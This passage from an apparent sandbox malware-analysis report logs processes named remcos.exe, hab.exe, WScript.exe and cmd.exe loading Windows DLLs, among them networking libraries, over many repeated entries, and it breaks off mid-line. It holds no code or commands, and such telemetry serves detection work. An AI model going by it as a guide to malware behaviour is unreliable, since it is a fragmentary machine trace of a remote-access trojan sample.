\"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005656)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005656)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00005744)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCP60.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Psapi.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00004300)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004300)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003576)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003576)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005984)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005984)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005984)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005984)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00005944)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003476)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003476)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00003996)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter GDI32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter MSVCP60.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WINMM.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter User32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Psapi.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00006020)\n \"hab.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006020)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\WScript.exe (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\wshext.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003016)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003016)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003564)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003564)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003564)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003564)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00002916)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter shell32 (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntdll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter IPHlpApi (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter advapi32 (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00002208)\n \"remcos.exe\" called \"LoadLibrary\" with a parameter 